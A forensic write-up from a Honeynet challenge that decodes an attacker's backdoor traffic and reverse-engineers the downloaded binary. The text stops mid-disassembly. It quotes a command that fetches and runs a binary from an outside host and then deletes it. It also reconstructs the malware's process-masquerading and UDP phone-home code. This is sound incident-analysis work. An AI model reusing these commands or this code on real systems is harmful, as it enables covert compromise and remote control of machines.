Scan of the Month 22 Analysis by Matei Conovici
===============================================

1. Introduction
---------------

This is an analysis of the activities that the attacker from the July
Reverse Challenge (http://project.honeynet.org) performed on a compromised
system. It is my first entry for a SoTM challenge, so please bear with me :)

2. Tools
--------

  - tcpdump
  - tcpflow
  - objdump
  - the decoder for backdoor NVP traffic
  - home-grown perl/C programs for annotating the binary disassembly

3. Analysis
-----------

3.1 NVP backdoor traffic analysis

First, we analyse the NVP backdoor traffic the attacker generated. As known
from the Reverse Challenge, the installed backdoor is a server listening for
commands sent using IP protocol 11 (NVP). The requests themselves come from
spoofed IP addresses of other compromised systems, acting as relays for the
attacker. Let's find out what's going on.

    void:~$ tcpdump -r snort-0718\@1401.log -w 00-NVP-traffic.log proto 11

The decoder was slightly modified to display some more information. The
protocol was decoded manually using the information in the Reverse Challenge
reports.

    void:~$ decoder -p 00-NVP-traffic.log | less

    src: 94.0.146.98 dst: 172.16.183.2 dir: handler->agent
    00 02 01 CB AD 90 32 00 00 00 00 00 00 00 00 00
    Comments: Command 02: Initialization, handler address is 203.173.144.50

OK, so the actual address of the handler is 203.173.144.50. We will only
look at the packets sent to it and ignore the other 8 fake addresses the
backdoor replies to.

    ----
    src: 192.146.201.172 dst: 172.16.183.2 dir: handler->agent
    00 03 67 72 65 70 20 2D 69 20 22 7A 6F 6E 65 22  ..grep -i "zone"
    20 2F 65 74 63 2F 6E 61 6D 65 64 2E 63 6F 6E 66   /etc/named.conf
    00
    Comments: Command 03: Execute command and return output
    (grep -i "zone" /etc/named.conf).

    ----
    src: 172.16.183.2 dst: 203.173.144.50 dir: agent->handler
    67 03 7A 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g.zone "." {.zon
    65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
    64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {
    Comments: Output was:
    -----------------
    zone "." {
    zone "0.0.127.in-addr.arpa" {
    -----------------

The attacker will not be very pleased. These are only the default root
hints and loopback reverse zones, so this machine is not really a
nameserver.

    ----
    src: 172.16.183.2 dst: 203.173.144.50 dir: agent->handler
    67 04 00 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g..one "." {.zon
    65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
    64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {
    Comments: This is the "continuation" of the first reply packet.
    Actually, it's the same data.

    ----
    src: 168.148.27.14 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
    65 72 76 65 00                                   erve
    Comments: Command 07: Execute, do not send output (killall -9 ttserve).
    Kill the 'ttserve' process if it is already running. We will see below
    that the binary to be installed is named ttserve.

    ----
    src: 10.39.81.89 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
    65 72 76 65 00                                   erve
    Comments: Repeat the kill command, maybe the first packet was lost.

    ----
    src: 58.248.76.90 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
    65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75  erve ; lynx -sou
    72 63 65 20 68 74 74 70 3A 2F 2F 32 31 36 2E 32  rce http://216.2
    34 32 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F  42.103.2:8882/fo
    6F 20 3E 20 2F 74 6D 70 2F 74 74 73 65 72 76 65  o > /tmp/ttserve
    20 3B 20 63 68 6D 6F 64 20 37 35 35 20 2F 74 6D   ; chmod 755 /tm
    70 2F 74 74 73 65 72 76 65 20 3B 20 63 64 20 2F  p/ttserve ; cd /
    74 6D 70 20 3B 20 2E 2F 74 74 73 65 72 76 65 20  tmp ; ./ttserve
    3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F 74 74  ; rm -rf /tmp/tt
    73 65 72 76 65 20 2E 2F 74 74 73 65 72 76 65 20  serve ./ttserve
    3B 00                                            ;
    Comments: Command 07: Execute command.
    --
    killall -9 ttserve
    lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve
    chmod 755 /tmp/ttserve
    cd /tmp
    ./ttserve
    rm -rf /tmp/ttserve ./ttserve
    --

Here, the attacker downloads a 'foo' file as /tmp/ttserve, launches it and
then removes the file. Because ttserve forks into the background and its
parent exits immediately, the shell proceeds straight to the rm. Once the
program is running, the file can be safely removed from the filesystem: the
kernel will not actually free it until the program exits, but it will no
longer be visible in the /tmp directory.

    ----
    src: 218.209.145.27 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
    78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
    74 74 73 65 72 76 65 3B 00                       ttserve;
    Comments: Command 07: execute command
    --
    killall -9 lynx
    rm -rf /tmp/ttserve
    --

After a while, if the download has not completed, lynx is killed and the
partially downloaded file is removed so it is not discovered.

    ----
    src: 122.255.17.55 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
    78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
    74 74 73 65 72 76 65 3B 00                       ttserve;
    Comments: Repeat the same command, in case the first packet was lost.

    ----
    src: 26.44.146.84 dst: 172.16.183.2 dir: handler->agent
    00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
    78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
    74 74 73 65 72 76 65 3B 00                       ttserve;
    Comments: Yet again.

And ... that was it. It looks like the attacker was only interested in
a) checking whether the machine acts as a nameserver for interesting zones,
and b) launching the 'foo' executable he downloaded. Later, we will see that
the address the file was downloaded from was his 'home base'.

Now, let's take a look at the downloaded file.
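The following is a minimal C sketch of a parser for the decoded handler->agent payloads. It makes the byte layout above explicit. It is not the Reverse Challenge decoder, and it assumes the payload has already been decoded. The layout is only inferred from the dumps shown here:

  - the command byte is at offset 1;
  - for command 02, the handler address is at offsets 3-6;
  - for commands 03 and 07, a NUL-terminated shell command starts at offset 2.

The name nvp_describe() is hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not part of the original decoder.
 * Describes an already-decoded handler->agent NVP payload using the
 * layout inferred from the dumps:
 *   byte 1                   command number
 *   cmd 02:   bytes 3..6     handler IPv4 address
 *   cmd 03/07: from byte 2   NUL-terminated shell command
 * Writes a one-line description into out and returns the command
 * byte, or -1 if the payload is too short. */
int nvp_describe(const unsigned char *p, size_t len, char *out, size_t outlen)
{
    if (len < 2 || outlen == 0)
        return -1;

    int cmd = p[1];
    if (cmd == 0x02) {
        if (len < 7)
            return -1;
        snprintf(out, outlen, "init, handler %u.%u.%u.%u",
                 (unsigned)p[3], (unsigned)p[4], (unsigned)p[5], (unsigned)p[6]);
    } else if (cmd == 0x03 || cmd == 0x07) {
        const char *line = (const char *)(p + 2);
        /* bounded length: stop at the NUL or at the end of the payload */
        const char *nul = memchr(line, '\0', len - 2);
        size_t n = nul ? (size_t)(nul - line) : len - 2;
        snprintf(out, outlen, "%s: %.*s",
                 cmd == 0x03 ? "exec+reply" : "exec", (int)n, line);
    } else {
        snprintf(out, outlen, "unknown command 0x%02x", (unsigned)cmd);
    }
    return cmd;
}
```

For example, feeding it the first packet above (00 02 01 CB AD 90 32 ...) produces "init, handler 203.173.144.50".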
3.2 Analysis of 'foo'
---------------------

Amusingly, "someone" changed the contents of the snort log so that the
address 'foo' was downloaded from appears to be 11.11.11.11 instead of
216.242.103.2. Oh well :-)

The 'foo' file was extracted from the snort log using tcpflow:

    void:~$ tcpflow -r snort-0718\@1401.log host 11.11.11.11 and port 8882

This results in two files, each containing the data sent by one of the two
endpoints of the TCP connection. We are interested in the data in
011.011.011.011.08882-172.016.183.002.01025.

    void:~$ less 011.011.011.011.08882-172.016.183.002.01025
    HTTP/1.1 200 OK
    Server: Foobarcatdog1
    Content-type: text/x-csrc
    Content-length: 215464
    Accept-Ranges: bytes

    ^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@<90><80>^4^@^@^@G^C^@^@^@^@^@4

OK, so it's an ELF binary, 215464 bytes in length. After editing the file
and removing the HTTP reply headers, we're left with the binary itself.

    void:~$ file foo-binary
    foo-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

What to do now? I decided not to take the chance of running the file, even
in a restricted environment, and to reverse engineer it instead. Running
'strings' on it reveals some interesting stuff, part of which is:

    void:~$ strings foo-binary | grep library
    @(#) The Linux C library 5.3.12

Aha, so it's built on the same system the backdoor was. Nice...

I used a technique learned from some Reverse Challenge reports to obtain
the library function addresses. I downloaded this version of the library
and unpacked libc.a, obtaining its object files. First, I obtained the list
of 'call' target addresses in the disassembly:

    void:~$ objdump -d foo-binary | grep 'call 0x' | cut -f2 -dx | sort | uniq >routines.txt

There are 378 unique addresses called. I wrote a small C program that
linearly searches the foo binary for the .text section of each library
object file.
The program replaces the relocation sites in the object files with 0xFF,
and these bytes are ignored when looking for matches. If a match is found,
each symbol in the .text section of the object file is output at the
address

    foo_text_start + foo_match_offset + symbol_offset_in_object

where:

    foo_text_start            virtual memory address of foo's .text section
    foo_match_offset          start of the object's .text section within
                              foo's .text section
    symbol_offset_in_object   the symbol's offset in the .text section of
                              the library object file

    void:~$ ./matchfunctions -a -r routines.txt -d objects.txt -b foo-binary >libcalls.txt

objects.txt is a file containing the path to each object file in the
library. The '-a' switch generates a 'libmatches.txt' file, in which the
symbols of ALL matching library objects are emitted.

    void:~$ cut -f1 -d: libcalls.txt | sort | uniq | wc -l

This tells me that 276 of the 378 calls were found to be library calls,
which leaves 102 unresolved addresses. Most of these must be intra-library
calls. Let's see which symbols are unresolved.

Time to look at the annotated disassembly of foo. I wrote a small perl
script that annotates each 'call' instruction with the library function
name if a match exists, or '??' if none was found.

    void:~$ objdump -d foo-binary >disassemble
    void:~$ annotate.pl disassemble | grep '??' | cut -f2 -dx | cut -f1 -d" " | sort | uniq >calls.txt

To remove intra-library calls, I looked for the lowest symbol address of
the library:

    void:~$ sort libmatches.txt | head -1
    080489e0: isalnum
    void:~$ sort calls.txt | less
    600cef30
    8048080
    8048110
    8048134
    8048258
    80482b8
    8048300
    8048318
    8048384
    804841c
    8048670
    80489a8
    8048b40
    ...

So everything from 0x080489e0 onwards (that is, everything after
0x080489a8) is library code and not interesting. This set is much more
manageable. 0x600cef30 looks like bad disassembly, so we take that out.

    void:~$ less disassemble-annotated.s

    08048080 <.init>:
     8048080:  e8 93 c9 02 00        call   0x8074a18 < ?? >
     8048085:  c2 00 00              ret    $0x0
    [...]
    08074a40 <.fini>:
     8074a40:  e8 cb 36 fd ff        call   0x8048110 < ?? >
     8074a45:  c2 00 00              ret    $0x0

OK, we also take out 0x08048080 and 0x08048110, which are library
initialization and finalization code. This leaves us with:

    0x08048134
    0x08048258
    0x080482b8
    0x08048300
    0x08048318
    0x08048384
    0x0804841c
    0x08048670
    0x080489a8

These 9 routines make up the attacker's program. I changed the annotate.pl
script to read a second file (in addition to the library matches), so that
I could assign names to these 9 functions as I disassembled them and found
out what they do.

The first function is main() at 0x08048134, as can be seen at the beginning
of the disassembly. The startup code calls it right after __libc_init and
passes its return value to 0x8055a50, which is exit():

     80480cf:  e8 6c bf 01 00        call   0x8064040 <__libc_init>
     80480d4:  68 40 4a 07 08        push   $0x8074a40
     80480d9:  e8 be d8 00 00        call   0x805599c
     80480de:  83 c4 04              add    $0x4,%esp
     80480e1:  e8 9a ff ff ff        call   0x8048080 < ?? >
     80480e6:  e8 49 00 00 00        call   0x8048134
     80480eb:  50                    push   %eax
     80480ec:  e8 5f d9 00 00        call   0x8055a50
     80480f1:  5b                    pop    %ebx
     80480f2:  8d b4 26 00 00 00 00  lea    0x0(%esi,1),%esi
     80480f9:  8d b4 26 00 00 00 00  lea    0x0(%esi,1),%esi
     8048100:  b8 01 00 00 00        mov    $0x1,%eax

So we'll start with that.
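The library-matching step described above can be sketched as follows. This is not the author's matchfunctions program, only a minimal illustration of the same idea: a byte-by-byte search in which relocation sites are ignored. It departs from the description in one way. Instead of treating every 0xFF byte as a wildcard, it assumes a separate mask marking the relocation sites, so that a genuine 0xFF byte in the library code is still compared. The names find_masked() and symbol_vaddr() are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Search hay for pattern, ignoring every position i where wild[i] != 0
 * (a relocation site in the library object's .text section).
 * Returns the offset of the first match, or -1 if there is none. */
long find_masked(const uint8_t *hay, size_t hlen,
                 const uint8_t *pattern, const uint8_t *wild, size_t plen)
{
    if (plen == 0 || plen > hlen)
        return -1;
    for (size_t off = 0; off + plen <= hlen; off++) {
        size_t i = 0;
        while (i < plen && (wild[i] || hay[off + i] == pattern[i]))
            i++;
        if (i == plen)
            return (long)off;
    }
    return -1;
}

/* Address reported for a symbol of a matched object, as in the text:
 * foo_text_start + foo_match_offset + symbol_offset_in_object. */
uint32_t symbol_vaddr(uint32_t foo_text_start, uint32_t foo_match_offset,
                      uint32_t symbol_offset_in_object)
{
    return foo_text_start + foo_match_offset + symbol_offset_in_object;
}
```

A linear scan like this costs roughly (size of foo's .text) x (object size) comparisons per object. That is acceptable for a one-off analysis of a 200 KB binary.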
    8048134:  55                    push   %ebp
    8048135:  89 e5                 mov    %esp,%ebp
    8048137:  81 ec 34 75 00 00     sub    $0x7534,%esp
    804813d:  c7 45 fc 00 00 00 00  movl   $0x0,0xfffffffc(%ebp)
    8048144:  68 30 75 00 00        push   $0x7530
    8048149:  6a 00                 push   $0x0
    804814b:  8d 85 cc 8a ff ff     lea    0xffff8acc(%ebp),%eax
    8048151:  50                    push   %eax
    8048152:  e8 2d c9 01 00        call   0x8064a84
    [...]

Disassembling this function and rewriting it as C code, it looks like this:

    int main(int argc, char **argv)
    {
        int l1;
        char buffer[30000];

        l1 = 0;
        memset(buffer, 0, 30000);
        memset(argv[0], 0, strlen(argv[0]));
        strcpy(argv[0], "(nfsiod)");
        signal(SIGCHLD, SIG_IGN);

        /* parent exits after fork() */
        if (fork() != 0)
            exit(0);

        /* become session leader */
        setsid();
        signal(SIGCHLD, SIG_IGN);

        /* uid 1 is usually 'daemon' */
        setuid(1);
        seteuid(1);

        /* parent exits after fork() */
        if (fork() != 0)
            exit(0);

        signal(SIGPIPE, SIG_IGN);
        chdir("/");
        signal(SIGCHLD, SIG_IGN);

        while (1) {
            l1 = function1(l1, buffer);      /* 0x0804841c */
            function2(l1, buffer, 30000);    /* 0x08048670 */
            sleep(1);
        }
    }

The code is "a bit" naive, but what it tries to do is daemonize and hide
itself by rewriting its command line, so that it appears in 'ps' as a
system process (nfsiod, running as user daemon). The actual work seems to
be performed in function1() and function2(), so we'll leave those for later
and first take a look at the other 6 functions.
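A side note on the argv[0] trick. main() zeroes strlen(argv[0]) bytes and then strcpy()s "(nfsiod)", which is 8 characters plus the terminating NUL. That writes past the original string whenever argv[0] is shorter than 8 characters ("./ttserve" is long enough, so it works here). A bounded version might look like the sketch below; mask_argv0() is a hypothetical helper.

On Linux, this kind of overwrite changes what /proc/<pid>/cmdline reports, and therefore the full command shown by 'ps aux'. It does not change the short command name the kernel records at exec time.

```c
#include <string.h>

/* Overwrite argv[0] in place with `fake`, never writing past the bytes
 * originally occupied by argv[0] (its terminating NUL is left intact).
 * Longer fake names are truncated. Returns the number of bytes copied. */
size_t mask_argv0(char *argv0, const char *fake)
{
    size_t room = strlen(argv0);   /* original length, excluding the NUL */
    size_t n = strlen(fake);

    if (n > room)
        n = room;                  /* truncate instead of overflowing */
    memset(argv0, 0, room);        /* wipe the real name */
    memcpy(argv0, fake, n);
    return n;
}
```

Called as mask_argv0(argv[0], "(nfsiod)") from main(), it behaves like the original code when argv[0] is at least 8 characters long.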
    8048258:  55                    push   %ebp
    8048259:  89 e5                 mov    %esp,%ebp
    804825b:  83 ec 08              sub    $0x8,%esp
    804825e:  8b 45 08              mov    0x8(%ebp),%eax
    8048261:  50                    push   %eax
    8048262:  e8 71 32 00 00        call   0x804b4d8
    8048267:  83 c4 04              add    $0x4,%esp
    804826a:  89 c0                 mov    %eax,%eax
    804826c:  89 c2                 mov    %eax,%edx
    804826e:  89 55 fc              mov    %edx,0xfffffffc(%ebp)
    8048271:  83 fa ff              cmp    $0xffffffff,%edx
    8048274:  75 39                 jne    0x80482af
    8048276:  8b 45 08              mov    0x8(%ebp),%eax
    8048279:  50                    push   %eax
    804827a:  e8 4d 23 00 00        call   0x804a5cc
    804827f:  83 c4 04              add    $0x4,%esp
    8048282:  89 c0                 mov    %eax,%eax
    8048284:  89 45 f8              mov    %eax,0xfffffff8(%ebp)
    8048287:  83 7d f8 00           cmpl   $0x0,0xfffffff8(%ebp)
    804828b:  75 0b                 jne    0x8048298
    804828d:  6a 00                 push   $0x0
    804828f:  e8 bc d7 00 00        call   0x8055a50
    8048294:  83 c4 04              add    $0x4,%esp
    8048297:  90                    nop
    8048298:  6a 04                 push   $0x4
    804829a:  8d 45 fc              lea    0xfffffffc(%ebp),%eax
    804829d:  50                    push   %eax
    804829e:  8b 45 f8              mov    0xfffffff8(%ebp),%eax
    80482a1:  8b 50 10              mov    0x10(%eax),%edx
    80482a4:  8b 02                 mov    (%edx),%eax
    80482a6:  50                    push   %eax
    80482a7:  e8 3c b6 01 00        call   0x80638e8
    80482ac:  83 c4 0c              add    $0xc,%esp
    80482af:  8b 45 fc              mov    0xfffffffc(%ebp),%eax
    80482b2:  eb 00                 jmp    0x80482b4
    80482b4:  89 ec                 mov    %ebp,%esp
    80482b6:  5d                    pop    %ebp
    80482b7:  c3                    ret

This is a helper routine that obtains an IP address from a string
containing either a dotted-decimal IP address or a host name. It seems the
attacker doesn't know that gethostbyname() already does that. Rewritten in
C, this routine looks something like this:

    unsigned int ip_address(char *name)
    {
        unsigned int ip;
        struct hostent *he;

        ip = inet_addr(name);
        if (ip != INADDR_NONE)          /* the binary compares with -1 */
            return ip;
        he = gethostbyname(name);
        if (!he)
            exit(0);
        bcopy(he->h_addr, &ip, 4);
        return ip;
    }

Let's look at the next function, at 0x080482b8.
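ip_address() relies on inet_addr() returning all ones (INADDR_NONE, i.e. -1) for anything that is not a dotted-quad address. That return value is ambiguous, because 255.255.255.255 is also all ones. The minimal sketch below performs the numeric check with inet_pton() instead, which reports success and failure separately. parse_ipv4() is a hypothetical name, and the gethostbyname() fallback is deliberately left out.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

/* Parse a dotted-decimal IPv4 address into four bytes in network order.
 * Returns 1 on success, 0 if `s` is not a numeric IPv4 address (a host
 * name, for instance, which would then need a resolver lookup). */
int parse_ipv4(const char *s, unsigned char out[4])
{
    struct in_addr a;

    if (inet_pton(AF_INET, s, &a) != 1)
        return 0;
    memcpy(out, &a.s_addr, 4);   /* s_addr is already in network order */
    return 1;
}
```

With inet_addr(), both "255.255.255.255" and "web.icq.com" come back as INADDR_NONE. parse_ipv4() accepts the first and rejects the second.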
    80482b8:  55                    push   %ebp
    80482b9:  89 e5                 mov    %esp,%ebp
    80482bb:  83 ec 04              sub    $0x4,%esp
    80482be:  6a 11                 push   $0x11
    80482c0:  6a 02                 push   $0x2
    80482c2:  6a 02                 push   $0x2
    80482c4:  e8 27 bd 01 00        call   0x8063ff0
    80482c9:  83 c4 0c              add    $0xc,%esp
    80482cc:  89 c0                 mov    %eax,%eax
    80482ce:  89 45 fc              mov    %eax,0xfffffffc(%ebp)
    80482d1:  83 7d fc 00           cmpl   $0x0,0xfffffffc(%ebp)
    80482d5:  75 0d                 jne    0x80482e4
    80482d7:  6a 00                 push   $0x0
    80482d9:  e8 72 d7 00 00        call   0x8055a50
    80482de:  83 c4 04              add    $0x4,%esp
    80482e1:  8d 76 00              lea    0x0(%esi),%esi
    80482e4:  68 00 08 00 00        push   $0x800
    80482e9:  6a 04                 push   $0x4
    80482eb:  8b 45 fc              mov    0xfffffffc(%ebp),%eax
    80482ee:  50                    push   %eax
    80482ef:  e8 94 c1 01 00        call   0x8064488
    80482f4:  83 c4 0c              add    $0xc,%esp
    80482f7:  8b 45 fc              mov    0xfffffffc(%ebp),%eax
    80482fa:  eb 00                 jmp    0x80482fc
    80482fc:  89 ec                 mov    %ebp,%esp
    80482fe:  5d                    pop    %ebp
    80482ff:  c3                    ret

Rewritten in C, this function looks like this:

    int nblk_udp_socket()
    {
        int sock;

        sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if (sock == 0)                  /* sic: socket() returns -1 on error */
            exit(0);
        fcntl(sock, F_SETFL, O_NONBLOCK);
        return sock;
    }

OK, so this function creates a non-blocking UDP socket. The check on the
return value of socket() is wrong: socket() returns -1 on error, not 0.

The next function is at 0x08048300.

    8048300:  55                    push   %ebp
    8048301:  89 e5                 mov    %esp,%ebp
    8048303:  8b 45 08              mov    0x8(%ebp),%eax
    8048306:  50                    push   %eax
    8048307:  e8 50 c1 01 00        call   0x806445c
    804830c:  83 c4 04              add    $0x4,%esp
    804830f:  31 c0                 xor    %eax,%eax
    8048311:  eb 01                 jmp    0x8048314
    8048313:  90                    nop
    8048314:  89 ec                 mov    %ebp,%esp
    8048316:  5d                    pop    %ebp
    8048317:  c3                    ret

This function proves to be very useful :-) It is a much-needed wrapper
around close(). We'll call it fd_close().
    int fd_close(int fd)
    {
        close(fd);
        return 0;
    }

The next function is at 0x08048318:

    8048318:  55                    push   %ebp
    8048319:  89 e5                 mov    %esp,%ebp
    804831b:  83 ec 10              sub    $0x10,%esp
    804831e:  83 7d 08 00           cmpl   $0x0,0x8(%ebp)
    8048322:  74 58                 je     0x804837c
    8048324:  6a 10                 push   $0x10
    8048326:  8d 45 f0              lea    0xfffffff0(%ebp),%eax
    8048329:  50                    push   %eax
    804832a:  e8 65 c5 01 00        call   0x8064894
    804832f:  83 c4 08              add    $0x8,%esp
    8048332:  68 53 4a 07 08        push   $0x8074a53
    8048337:  e8 1c ff ff ff        call   0x8048258
    804833c:  83 c4 04              add    $0x4,%esp
    804833f:  89 c0                 mov    %eax,%eax
    8048341:  89 45 f4              mov    %eax,0xfffffff4(%ebp)
    8048344:  66 c7 45 f0 02 00     movw   $0x2,0xfffffff0(%ebp)
    804834a:  66 c7 45 f2 d0 a5     movw   $0xa5d0,0xfffffff2(%ebp)
    8048350:  6a 10                 push   $0x10
    8048352:  8d 45 f0              lea    0xfffffff0(%ebp),%eax
    8048355:  50                    push   %eax
    8048356:  6a 00                 push   $0x0
    8048358:  8b 45 10              mov    0x10(%ebp),%eax
    804835b:  50                    push   %eax
    804835c:  8b 45 0c              mov    0xc(%ebp),%eax
    804835f:  50                    push   %eax
    8048360:  8b 45 08              mov    0x8(%ebp),%eax
    8048363:  50                    push   %eax
    8048364:  e8 27 bc 01 00        call   0x8063f90
    8048369:  83 c4 18              add    $0x18,%esp
    804836c:  89 c0                 mov    %eax,%eax
    804836e:  85 c0                 test   %eax,%eax
    8048370:  7d 0a                 jge    0x804837c
    8048372:  6a 00                 push   $0x0
    8048374:  e8 d7 d6 00 00        call   0x8055a50
    8048379:  83 c4 04              add    $0x4,%esp
    804837c:  31 c0                 xor    %eax,%eax
    804837e:  eb 00                 jmp    0x8048380
    8048380:  89 ec                 mov    %ebp,%esp
    8048382:  5d                    pop    %ebp
    8048383:  c3                    ret

Let's translate this into C:

    void send_home_message(int sock, char *buffer, int len)
    {
        struct sockaddr_in saddr;

        if (sock == 0)
            return;
        bzero(&saddr, sizeof(struct sockaddr_in));
        saddr.sin_addr.s_addr = ip_address("216.242.103.2");
        saddr.sin_family = AF_INET;
        saddr.sin_port = 42448;         /* htons(53413) on little-endian x86 */
        if (sendto(sock, buffer, len, 0, (struct sockaddr *) &saddr,
                   sizeof(struct sockaddr_in)) < 0)
            exit(0);
    }

This routine sends some data to the mother ship :-)

The next routine is at 0x08048384.
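The two socket helpers above can be written without the pitfalls noted in the text. The sketch below is hypothetical: the names nblk_udp_socket_checked() and home_addr() are mine, not from the binary. It makes three changes:

  - it checks socket() for -1;
  - it keeps the existing file status flags when setting O_NONBLOCK;
  - it builds the destination port with htons(53413) instead of the hard-coded 42448, which equals htons(53413) only on a little-endian host.

```c
#include <arpa/inet.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Non-blocking UDP socket with correct error handling.
 * Returns the descriptor, or -1 on failure. */
int nblk_udp_socket_checked(void)
{
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == -1)                       /* failure is -1, not 0 */
        return -1;

    int flags = fcntl(sock, F_GETFL, 0);  /* read, then add O_NONBLOCK */
    if (flags == -1 || fcntl(sock, F_SETFL, flags | O_NONBLOCK) == -1) {
        close(sock);
        return -1;
    }
    return sock;
}

/* Fill in the destination used by send_home_message(): UDP port 53413
 * in network byte order (bytes d0 a5 in memory on any host). */
void home_addr(struct sockaddr_in *sa, in_addr_t ip_net_order)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(53413);
    sa->sin_addr.s_addr = ip_net_order;
}
```

On x86, the movw $0xa5d0 in the disassembly stores the bytes d0 a5, which is exactly what htons(53413) produces there.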
    8048384:  55                    push   %ebp
    8048385:  89 e5                 mov    %esp,%ebp
    8048387:  83 ec 18              sub    $0x18,%esp
    804838a:  c7 45 ec 10 00 00 00  movl   $0x10,0xffffffec(%ebp)
    8048391:  c7 45 e8 00 00 00 00  movl   $0x0,0xffffffe8(%ebp)
    8048398:  8b 45 10              mov    0x10(%ebp),%eax
    804839b:  50                    push   %eax
    804839c:  8b 45 0c              mov    0xc(%ebp),%eax
    804839f:  50                    push   %eax
    80483a0:  e8 ef c4 01 00        call   0x8064894
    80483a5:  83 c4 08              add    $0x8,%esp
    80483a8:  83 7d 08 00           cmpl   $0x0,0x8(%ebp)
    80483ac:  74 66                 je     0x8048414
    80483ae:  6a 10                 push   $0x10
    80483b0:  8d 45 f0              lea    0xfffffff0(%ebp),%eax
    80483b3:  50                    push   %eax
    80483b4:  e8 db c4 01 00        call   0x8064894
    80483b9:  83 c4 08              add    $0x8,%esp
    80483bc:  68 53 4a 07 08        push   $0x8074a53
    80483c1:  e8 92 fe ff ff        call   0x8048258
    80483c6:  83 c4 04              add    $0x4,%esp
    80483c9:  89 c0                 mov    %eax,%eax
    80483cb:  89 45 f4              mov    %eax,0xfffffff4(%ebp)
    80483ce:  66 c7 45 f0 02 00     movw   $0x2,0xfffffff0(%ebp)
    80483d4:  66 c7 45 f2 d0 a5     movw   $0xa5d0,0xfffffff2(%ebp)
    80483da:  8d 45 ec              lea    0xffffffec(%ebp),%eax
    80483dd:  50                    push   %eax
    80483de:  8d 45 f0              lea    0xfffffff0(%ebp),%eax
    80483e1:  50                    push   %eax
    80483e2:  6a 00                 push   $0x0
    80483e4:  8b 45 10              mov    0x10(%ebp),%eax
    80483e7:  50                    push   %eax
    80483e8:  8b 45 0c              mov    0xc(%ebp),%eax
    80483eb:  50                    push   %eax
    80483ec:  8b 45 08              mov    0x8(%ebp),%eax
    80483ef:  50                    push   %eax
    80483f0:  e8 ef ba 01 00        call   0x8063ee4
    80483f5:  83 c4 18              add    $0x18,%esp
    80483f8:  89 c0                 mov    %eax,%eax
    80483fa:  89 45 e8              mov    %eax,0xffffffe8(%ebp)
    80483fd:  83 7d e8 00           cmpl   $0x0,0xffffffe8(%ebp)
    8048401:  7d 09                 jge    0x804840c
    8048403:  31 c0                 xor    %eax,%eax
    8048405:  eb 11                 jmp    0x8048418
    8048407:  90                    nop
    8048408:  eb 0a                 jmp    0x8048414
    804840a:  8d 36                 lea    (%esi),%esi
    804840c:  b8 01 00 00 00        mov    $0x1,%eax
    8048411:  eb 05                 jmp    0x8048418
    8048413:  90                    nop
    8048414:  31 c0                 xor    %eax,%eax
    8048416:  eb 00                 jmp    0x8048418
    8048418:  89 ec                 mov    %ebp,%esp
    804841a:  5d                    pop    %ebp
    804841b:  c3                    ret

This looks like the inverse of send_home_message, so we'll call it
recv_home_message.
    int recv_home_message(int sock, char *buffer, int len)
    {
        struct sockaddr_in saddr;
        int slen;
        int nbytes;

        slen = sizeof(struct sockaddr_in);
        nbytes = 0;
        bzero(buffer, len);
        if (sock == 0)
            return 0;
        bzero(&saddr, sizeof(struct sockaddr_in));
        saddr.sin_addr.s_addr = ip_address("216.242.103.2");
        saddr.sin_family = AF_INET;
        saddr.sin_port = 42448;         /* htons(53413) on little-endian x86 */
        /* recvfrom() overwrites saddr with the sender's address; it does
           not filter on it, so the setup above has no effect */
        nbytes = recvfrom(sock, buffer, len, 0, (struct sockaddr *) &saddr,
                          &slen);
        if (nbytes >= 0)
            return 1;
        return 0;
    }

The next two functions in address order (0x0804841c and 0x08048670) are
rather long, because they perform the actual work (they are the two
routines called from main()). So we'll look at 0x080489a8 first.

    80489a8:  55                    push   %ebp
    80489a9:  89 e5                 mov    %esp,%ebp
    80489ab:  83 ec 04              sub    $0x4,%esp
    80489ae:  8d 45 fc              lea    0xfffffffc(%ebp),%eax
    80489b1:  50                    push   %eax
    80489b2:  68 1b 54 00 00        push   $0x541b
    80489b7:  8b 45 08              mov    0x8(%ebp),%eax
    80489ba:  50                    push   %eax
    80489bb:  e8 6c bb 01 00        call   0x806452c
    80489c0:  83 c4 0c              add    $0xc,%esp
